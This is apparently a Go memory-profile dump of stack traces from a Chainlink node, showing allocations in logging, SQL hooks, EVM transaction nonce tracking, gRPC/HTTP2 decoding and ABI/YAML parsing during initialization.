# 0x19fe4d0 github.com/smartcontractkit/chainlink-framework/multinode.(*Poller[...]).pollingLoop+0x130 /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/multinode@v0.0.0-20260521164805-26d78d5e1243/poller.go:79
# 0x19fe842 github.com/smartcontractkit/chainlink-framework/multinode.(*Poller[...]).start.(*Engine).Go.func2+0x42 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/services/service.go:72
# 0x4a4d09 sync.(*WaitGroup).Go.func1+0x49 /usr/local/go/src/sync/waitgroup.go:258
0: 0 [0: 0] @ 0x48e865 0x4287c5 0xb1c29f 0xb2c3c2 0xb2edb6 0xb60796 0xb607c8 0xb6266e 0xfa7f76 0x12a8a37 0xfa4a7b 0xfa4be3 0x12a8bce 0xfa4a7b 0xfa5ffd 0x1af0a4d 0x1b0ae27 0x1b0acd7 0x1b1bf42 0x4994c1
# 0xb1c29e go.uber.org/zap/zapcore.(*sampler).With+0x3e /go/pkg/mod/go.uber.org/zap@v1.28.0/zapcore/sampler.go:204
# 0xb2c3c1 go.uber.org/zap.(*Logger).With+0xe1 /go/pkg/mod/go.uber.org/zap@v1.28.0/logger.go:185
# 0xb2edb5 go.uber.org/zap.(*SugaredLogger).With+0x35 /go/pkg/mod/go.uber.org/zap@v1.28.0/sugar.go:115
# 0xb60795 github.com/smartcontractkit/chainlink-common/pkg/logger.(*logger).with+0x55 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/logger/logger.go:173
# 0xb607c7 github.com/smartcontractkit/chainlink-common/pkg/logger.With+0x87 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/logger/logger.go:202
# 0xb6266d github.com/smartcontractkit/chainlink-common/pkg/logger.(*sugared).With+0x2d /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/logger/sugared.go:156
# 0xfa7f75 github.com/smartcontractkit/chainlink-common/pkg/sqlutil.(*queryLogger).logTiming+0xf5 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/sqlutil/monitor.go:125
# 0x12a8a36 github.com/smartcontractkit/chainlink-common/pkg/loop.(*Server).start.MonitorHook.func7+0x1b6 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/sqlutil/monitor.go:43
# 0xfa4a7a github.com/smartcontractkit/chainlink-common/pkg/sqlutil.WrapDataSource.func1+0x1ba /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/sqlutil/hook.go:49
# 0xfa4be2 github.com/smartcontractkit/chainlink-common/pkg/sqlutil.WrapDataSource.func1.1+0x102 /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/sqlutil/hook.go:51
# 0x12a8bcd github.com/smartcontractkit/chainlink-common/pkg/loop.(*Server).start.TimeoutHook.func6+0xad /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/sqlutil/timeout.go:20
# 0xfa4a7a github.com/smartcontractkit/chainlink-common/pkg/sqlutil.WrapDataSource.func1+0x1ba /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/sqlutil/hook.go:49
# 0xfa5ffc github.com/smartcontractkit/chainlink-common/pkg/sqlutil.(*wrappedDataSource).GetContext+0x11c /go/pkg/mod/github.com/smartcontractkit/chainlink-common@v0.11.2-0.20260715145851-8219609496a4/pkg/sqlutil/hook.go:147
# 0x1af0a4c github.com/smartcontractkit/chainlink-evm/pkg/txmgr.(*evmTxStore).FindLatestSequence+0x1ec /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/txmgr/evm_tx_store.go:1028
# 0x1b0ae26 github.com/smartcontractkit/chainlink-evm/pkg/txmgr.(*nonceTracker).getSequenceForAddr+0x66 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/txmgr/nonce_tracker.go:68
# 0x1b0acd6 github.com/smartcontractkit/chainlink-evm/pkg/txmgr.(*nonceTracker).LoadNextSequences+0x196 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/txmgr/nonce_tracker.go:58
# 0x1b1bf41 github.com/smartcontractkit/chainlink-framework/chains/txmgr.(*Broadcaster[...]).loadAndMonitor+0xe1 /go/pkg/mod/github.com/smartcontractkit/chainlink-framework/chains@v0.0.0-20260724153515-bb6a2de39bcb/txmgr/broadcaster.go:206
0: 0 [0: 0] @ 0x48e865 0x4287c5 0xa91286 0x97f8cd 0x9787bf 0x4994c1
# 0xa91285 go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc.(*serverHandler).TagRPC+0xa05 /go/pkg/mod/go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc@v0.68.0/stats_handler.go:147
# 0x97f8cc google.golang.org/grpc.(*Server).handleStream+0x44c /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1839
# 0x9787be google.golang.org/grpc.(*Server).serveStreams.func2.1+0x7e /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1065
0: 0 [0: 0] @ 0x48e86c 0x4287c5 0x8c8ad3 0x8c8b0e 0x4a36ac 0x8c86a5 0x8c8687 0x8c86ba 0x8c8535 0x8c7d74 0x8c77a5 0x8c75d3 0x8d1092 0x8cbe85 0x8ff67b 0x8f7b3f 0x978568 0x977d36 0x4994c1
# 0x8c8ad2 golang.org/x/net/http2/hpack.newInternalNode+0x172 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/hpack/huffman.go:125
# 0x8c8b0d golang.org/x/net/http2/hpack.buildRootHuffmanNode+0x1ad /go/pkg/mod/golang.org/x/net@v0.55.0/http2/hpack/huffman.go:154
# 0x4a36ab sync.(*Once).doSlow+0xab /usr/local/go/src/sync/once.go:78
# 0x8c86a4 sync.(*Once).Do+0x44 /usr/local/go/src/sync/once.go:69
# 0x8c8686 golang.org/x/net/http2/hpack.getRootHuffmanNode+0x26 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/hpack/huffman.go:134
# 0x8c86b9 golang.org/x/net/http2/hpack.huffmanDecode+0x59 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/hpack/huffman.go:50
# 0x8c8534 golang.org/x/net/http2/hpack.(*Decoder).decodeString+0x94 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/hpack/hpack.go:516
# 0x8c7d73 golang.org/x/net/http2/hpack.(*Decoder).parseFieldLiteral+0x333 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/hpack/hpack.go:386
# 0x8c77a4 golang.org/x/net/http2/hpack.(*Decoder).parseHeaderFieldRepr+0xe4 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/hpack/hpack.go:316
# 0x8c75d2 golang.org/x/net/http2/hpack.(*Decoder).Write+0x132 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/hpack/hpack.go:262
# 0x8d1091 golang.org/x/net/http2.(*Framer).readMetaFrame+0x2d1 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/frame.go:1793
# 0x8cbe84 golang.org/x/net/http2.(*Framer).ReadFrameForHeader+0x364 /go/pkg/mod/golang.org/x/net@v0.55.0/http2/frame.go:556
# 0x8ff67a google.golang.org/grpc/internal/transport.(*framer).readFrame+0xda /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http_util.go:504
# 0x8f7b3e google.golang.org/grpc/internal/transport.(*http2Server).HandleStreams+0xfe /go/pkg/mod/google.golang.org/grpc@v1.81.0/internal/transport/http2_server.go:638
# 0x978567 google.golang.org/grpc.(*Server).serveStreams+0x367 /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:1059
# 0x977d35 google.golang.org/grpc.(*Server).handleRawConn.func1+0x55 /go/pkg/mod/google.golang.org/grpc@v1.81.0/server.go:993
0: 0 [1: 32768] @ 0x48e88c 0x493c69 0x6f07ee 0x6f0485 0x6f0235 0x13827d4 0x1bbea05 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6f07ed encoding/json.(*Decoder).refill+0xed /usr/local/go/src/encoding/json/stream.go:161
# 0x6f0484 encoding/json.(*Decoder).readValue+0x84 /usr/local/go/src/encoding/json/stream.go:142
# 0x6f0234 encoding/json.(*Decoder).Decode+0x74 /usr/local/go/src/encoding/json/stream.go:65
# 0x13827d3 github.com/ethereum/go-ethereum/accounts/abi.JSON+0xb3 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:52
# 0x1bbea04 github.com/smartcontractkit/chainlink-evm/pkg/read.init+0xc4 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/read/event.go:807
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 96] @ 0x48e865 0x493c69 0x6d7a67 0x6d4fa4 0x6d7965 0x138fdac 0x13850ef 0x6dec0e 0x6dd7de 0x6de35b 0x6dd814 0x6df2e5 0x6dd7de 0x6de35b 0x6dd814 0x6dd03e 0x6dcc19 0x13837d8 0x6de208 0x6dd814 0x6dd03e 0x6f031f 0x13827d4 0x14d77b7 0x1b9d3be 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6d7a66 regexp.(*Regexp).FindAllStringSubmatch.func1+0xa6 /usr/local/go/src/regexp/regexp.go:1180
# 0x6d4fa3 regexp.(*Regexp).allMatches+0x2c3 /usr/local/go/src/regexp/regexp.go:790
# 0x6d7964 regexp.(*Regexp).FindAllStringSubmatch+0x64 /usr/local/go/src/regexp/regexp.go:1176
# 0x138fdab github.com/ethereum/go-ethereum/accounts/abi.NewType+0x62b /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/type.go:119
# 0x13850ee github.com/ethereum/go-ethereum/accounts/abi.(*Argument).UnmarshalJSON+0x14e /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/argument.go:53
# 0x6dec0d encoding/json.(*decodeState).object+0x68d /usr/local/go/src/encoding/json/decode.go:610
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6de35a encoding/json.(*decodeState).array+0x4da /usr/local/go/src/encoding/json/decode.go:561
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6df2e4 encoding/json.(*decodeState).object+0xd64 /usr/local/go/src/encoding/json/decode.go:767
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6de35a encoding/json.(*decodeState).array+0x4da /usr/local/go/src/encoding/json/decode.go:561
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6dcc18 encoding/json.Unmarshal+0xf8 /usr/local/go/src/encoding/json/decode.go:113
# 0x13837d7 github.com/ethereum/go-ethereum/accounts/abi.(*ABI).UnmarshalJSON+0x77 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:160
# 0x6de207 encoding/json.(*decodeState).array+0x387 /usr/local/go/src/encoding/json/decode.go:513
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6f031e encoding/json.(*Decoder).Decode+0x15e /usr/local/go/src/encoding/json/stream.go:75
# 0x13827d3 github.com/ethereum/go-ethereum/accounts/abi.JSON+0xb3 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:52
# 0x14d77b6 github.com/ethereum/go-ethereum/accounts/abi/bind.(*MetaData).GetAbi+0x176 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/bind/old.go:266
# 0x1b9d3bd github.com/smartcontractkit/chainlink-evm/pkg/functions.init.0+0x1d /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/functions/config_poller.go:48
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 16384] @ 0x48e88c 0x493c69 0x6f07ee 0x6f0485 0x6f0235 0x13827d4 0x14d77b7 0x1b9d3be 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6f07ed encoding/json.(*Decoder).refill+0xed /usr/local/go/src/encoding/json/stream.go:161
# 0x6f0484 encoding/json.(*Decoder).readValue+0x84 /usr/local/go/src/encoding/json/stream.go:142
# 0x6f0234 encoding/json.(*Decoder).Decode+0x74 /usr/local/go/src/encoding/json/stream.go:65
# 0x13827d3 github.com/ethereum/go-ethereum/accounts/abi.JSON+0xb3 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:52
# 0x14d77b6 github.com/ethereum/go-ethereum/accounts/abi/bind.(*MetaData).GetAbi+0x176 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/bind/old.go:266
# 0x1b9d3bd github.com/smartcontractkit/chainlink-evm/pkg/functions.init.0+0x1d /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/functions/config_poller.go:48
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 128] @ 0x48e865 0x4249ab 0x138a6a5 0x1384137 0x6de208 0x6dd814 0x6dd03e 0x6f031f 0x13827d4 0x1bbeb6a 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x138a6a4 github.com/ethereum/go-ethereum/accounts/abi.NewMethod+0x3c4 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/method.go:101
# 0x1384136 github.com/ethereum/go-ethereum/accounts/abi.(*ABI).UnmarshalJSON+0x9d6 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:172
# 0x6de207 encoding/json.(*decodeState).array+0x387 /usr/local/go/src/encoding/json/decode.go:513
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6f031e encoding/json.(*Decoder).Decode+0x15e /usr/local/go/src/encoding/json/stream.go:75
# 0x13827d3 github.com/ethereum/go-ethereum/accounts/abi.JSON+0xb3 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:52
# 0x1bbeb69 github.com/smartcontractkit/chainlink-evm/pkg/read.init+0x229 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/read/event.go:808
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 16] @ 0x48e865 0x48e1c5 0xd2fe11 0xd2f8f4 0xd33015 0xd31a65 0xd2f90c 0xd323cb 0xd2f90c 0xd339fe 0xd31a65 0xd2f90c 0xd2f793 0xd2f7a0 0xd5af71 0xe947f0 0xe947cf 0xe8a872 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0xd2fe10 gopkg.in/yaml%2ev3.(*decoder).scalar+0x1f0 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:570
# 0xd2f8f3 gopkg.in/yaml%2ev3.(*decoder).unmarshal+0x353 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:508
# 0xd33014 gopkg.in/yaml%2ev3.(*decoder).mappingStruct+0x5f4 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:911
# 0xd31a64 gopkg.in/yaml%2ev3.(*decoder).mapping+0xa4 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:786
# 0xd2f90b gopkg.in/yaml%2ev3.(*decoder).unmarshal+0x36b /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:510
# 0xd323ca gopkg.in/yaml%2ev3.(*decoder).mapping+0xa0a /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:848
# 0xd2f90b gopkg.in/yaml%2ev3.(*decoder).unmarshal+0x36b /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:510
# 0xd339fd gopkg.in/yaml%2ev3.(*decoder).mappingStruct+0xfdd /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:935
# 0xd31a64 gopkg.in/yaml%2ev3.(*decoder).mapping+0xa4 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:786
# 0xd2f90b gopkg.in/yaml%2ev3.(*decoder).unmarshal+0x36b /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:510
# 0xd2f792 gopkg.in/yaml%2ev3.(*decoder).document+0x1f2 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:527
# 0xd2f79f gopkg.in/yaml%2ev3.(*decoder).unmarshal+0x1ff /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/decode.go:498
# 0xd5af70 gopkg.in/yaml%2ev3.unmarshal+0x390 /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/yaml.go:167
# 0xe947ef gopkg.in/yaml%2ev3.Unmarshal+0x4f /go/pkg/mod/gopkg.in/yaml.v3@v3.0.1/yaml.go:89
# 0xe947ce github.com/smartcontractkit/chain-selectors.parseYml+0x2e /go/pkg/mod/github.com/smartcontractkit/chain-selectors@v1.0.100/evm.go:72
# 0xe8a871 github.com/smartcontractkit/chain-selectors.init+0x2b1 /go/pkg/mod/github.com/smartcontractkit/chain-selectors@v1.0.100/evm.go:22
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 32] @ 0x48e865 0x4287c5 0x4136b2 0x415737 0x4154a5 0x417ac9 0xa1b178 0xa1be5e 0xa1aa93 0xa1aa23 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0xa1b177 github.com/prometheus/client_golang/prometheus.(*Registry).Register+0x377 /go/pkg/mod/github.com/prometheus/client_golang@v1.23.2/prometheus/registry.go:306
# 0xa1be5d github.com/prometheus/client_golang/prometheus.(*Registry).MustRegister+0x5d /go/pkg/mod/github.com/prometheus/client_golang@v1.23.2/prometheus/registry.go:405
# 0xa1aa92 github.com/prometheus/client_golang/prometheus.MustRegister+0xf2 /go/pkg/mod/github.com/prometheus/client_golang@v1.23.2/prometheus/registry.go:177
# 0xa1aa22 github.com/prometheus/client_golang/prometheus.init.0+0x82 /go/pkg/mod/github.com/prometheus/client_golang@v1.23.2/prometheus/registry.go:62
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [0: 0] @ 0x48e865 0x4287c5 0x5e4aac 0x5e2953 0x5cbb85 0x5cc825 0x89dbf2 0x8a0ba7 0x89f5f2 0x89f435 0x4994c1
# 0x5e4aab net.(*Resolver).lookupIPAddr+0x28b /usr/local/go/src/net/lookup.go:334
# 0x5e2952 net.(*Resolver).internetAddrList+0x4b2 /usr/local/go/src/net/ipsock.go:289
# 0x5cbb84 net.(*Resolver).resolveAddrList+0x3e4 /usr/local/go/src/net/dial.go:354
# 0x5cc824 net.(*Dialer).DialContext+0x1c4 /usr/local/go/src/net/dial.go:539
# 0x89dbf1 net/http.(*Transport).dial+0xd1 /usr/local/go/src/net/http/transport.go:1307
# 0x8a0ba6 net/http.(*Transport).dialConn+0x846 /usr/local/go/src/net/http/transport.go:1815
# 0x89f5f1 net/http.(*Transport).dialConnFor+0xd1 /usr/local/go/src/net/http/transport.go:1648
# 0x89f434 net/http.(*Transport).startDialConnForLocked.func1+0x34 /usr/local/go/src/net/http/transport.go:1629
0: 0 [1: 8192] @ 0x48e88c 0x493c69 0x6f07ee 0x6f0485 0x6f0235 0x13827d4 0x19a05a5 0x1c756cb 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6f07ed encoding/json.(*Decoder).refill+0xed /usr/local/go/src/encoding/json/stream.go:161
# 0x6f0484 encoding/json.(*Decoder).readValue+0x84 /usr/local/go/src/encoding/json/stream.go:142
# 0x6f0234 encoding/json.(*Decoder).Decode+0x74 /usr/local/go/src/encoding/json/stream.go:65
# 0x13827d3 github.com/ethereum/go-ethereum/accounts/abi.JSON+0xb3 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:52
# 0x19a05a4 github.com/smartcontractkit/chainlink-evm/pkg/types.MustGetABI+0xe4 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/types/utils.go:10
# 0x1c756ca github.com/smartcontractkit/chainlink-evm/pkg/automation/v21/core.init+0xaa /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/automation/v21/core/abi.go:12
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 640] @ 0x48e86c 0x494207 0x494447 0x4f5ea5 0x4f5d4e 0x6de285 0x6dd814 0x6df2e5 0x6dd7de 0x6de35b 0x6dd814 0x6dd03e 0x6dcc19 0x13837d8 0x6de208 0x6dd814 0x6dd03e 0x6f031f 0x13827d4 0x14d77b7 0x1b9d3be 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x494446 reflect.growslice+0x46 /usr/local/go/src/runtime/slice.go:373
# 0x4f5ea4 reflect.Value.grow+0xa4 /usr/local/go/src/reflect/value.go:2746
# 0x4f5d4d reflect.Value.Grow+0x6d /usr/local/go/src/reflect/value.go:2733
# 0x6de284 encoding/json.(*decodeState).array+0x404 /usr/local/go/src/encoding/json/decode.go:552
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6df2e4 encoding/json.(*decodeState).object+0xd64 /usr/local/go/src/encoding/json/decode.go:767
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6de35a encoding/json.(*decodeState).array+0x4da /usr/local/go/src/encoding/json/decode.go:561
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6dcc18 encoding/json.Unmarshal+0xf8 /usr/local/go/src/encoding/json/decode.go:113
# 0x13837d7 github.com/ethereum/go-ethereum/accounts/abi.(*ABI).UnmarshalJSON+0x77 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:160
# 0x6de207 encoding/json.(*decodeState).array+0x387 /usr/local/go/src/encoding/json/decode.go:513
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6f031e encoding/json.(*Decoder).Decode+0x15e /usr/local/go/src/encoding/json/stream.go:75
# 0x13827d3 github.com/ethereum/go-ethereum/accounts/abi.JSON+0xb3 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:52
# 0x14d77b6 github.com/ethereum/go-ethereum/accounts/abi/bind.(*MetaData).GetAbi+0x176 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/bind/old.go:266
# 0x1b9d3bd github.com/smartcontractkit/chainlink-evm/pkg/functions.init.0+0x1d /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/functions/config_poller.go:48
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 176] @ 0x48e865 0x493c69 0x1389845 0x1383b55 0x6de208 0x6dd814 0x6dd03e 0x6f031f 0x13827d4 0x1bba165 0x1bb5b26 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x1389844 github.com/ethereum/go-ethereum/accounts/abi.NewEvent+0x144 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/event.go:66
# 0x1383b54 github.com/ethereum/go-ethereum/accounts/abi.(*ABI).UnmarshalJSON+0x3f4 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:192
# 0x6de207 encoding/json.(*decodeState).array+0x387 /usr/local/go/src/encoding/json/decode.go:513
# 0x6dd813 encoding/json.(*decodeState).value+0x73 /usr/local/go/src/encoding/json/decode.go:370
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6f031e encoding/json.(*Decoder).Decode+0x15e /usr/local/go/src/encoding/json/stream.go:75
# 0x13827d3 github.com/ethereum/go-ethereum/accounts/abi.JSON+0xb3 /go/pkg/mod/github.com/ethereum/go-ethereum@v1.17.3/accounts/abi/abi.go:52
# 0x1bba164 github.com/smartcontractkit/chainlink-evm/pkg/llo.makeConfigDigestArgs+0xc4 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/llo/offchain_config_digester.go:80
# 0x1bb5b25 github.com/smartcontractkit/chainlink-evm/pkg/llo.init+0xc5 /go/pkg/mod/github.com/smartcontractkit/chainlink-evm@v0.3.4-0.20260728111445-96c471be2872/pkg/llo/offchain_config_digester.go:88
# 0x469114 runtime.doInit1+0xd4 /usr/local/go/src/runtime/proc.go:8103
# 0x4596cf runtime.doInit+0x26f /usr/local/go/src/runtime/proc.go:8070
# 0x4596a6 runtime.main+0x246 /usr/local/go/src/runtime/proc.go:258
0: 0 [1: 288] @ 0x48e865 0x48ea5e 0x48eaf3 0x412185 0x412178 0x418799 0x6e290d 0x6e25b9 0x6e28e8 0x6e25b9 0x6e28e8 0x6deb32 0x6dd7de 0x6dd03e 0x6f031f 0xde77c5 0xde639c 0xddaad7 0xddaf7b 0xddb79f 0xddbcdf 0xddc945 0xddc4d3 0xddbbec 0xde1b87 0xde19ff 0xdddaed 0xddc4d3 0xddbadf 0xddb7f8 0xddacfa 0xddab98 0xde207e 0xde382d 0x469115 0x4596d0 0x4596a7 0x4994c1
# 0x6e290c encoding/json.(*decodeState).objectInterface+0x14c /usr/local/go/src/encoding/json/decode.go:1110
# 0x6e25b8 encoding/json.(*decodeState).valueInterface+0x58 /usr/local/go/src/encoding/json/decode.go:1043
# 0x6e28e7 encoding/json.(*decodeState).objectInterface+0x127 /usr/local/go/src/encoding/json/decode.go:1110
# 0x6e25b8 encoding/json.(*decodeState).valueInterface+0x58 /usr/local/go/src/encoding/json/decode.go:1043
# 0x6e28e7 encoding/json.(*decodeState).objectInterface+0x127 /usr/local/go/src/encoding/json/decode.go:1110
# 0x6deb31 encoding/json.(*decodeState).object+0x5b1 /usr/local/go/src/encoding/json/decode.go:622
# 0x6dd7dd encoding/json.(*decodeState).value+0x3d /usr/local/go/src/encoding/json/decode.go:380
# 0x6dd03d encoding/json.(*decodeState).unmarshal+0x11d /usr/local/go/src/encoding/json/decode.go:183
# 0x6f031e encoding/json.(*Decoder).Decode+0x15e /usr/local/go/src/encoding/json/stream.go:75
# 0xde77c4 github.com/santhosh-tekuri/jsonschema/v5.unmarshal+0x84 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/resource.go:273
# 0xde639b github.com/santhosh-tekuri/jsonschema/v5.newResource+0x7b /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/resource.go:31
# 0xddaad6 github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).AddResource+0x36 /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:103
# 0xddaf7a github.com/santhosh-tekuri/jsonschema/v5.(*Compiler).findResource+0x1da /go/pkg/mod/github.com/santhosh-tekuri/jsonschema/v5@v5.3.1/compiler.go:158
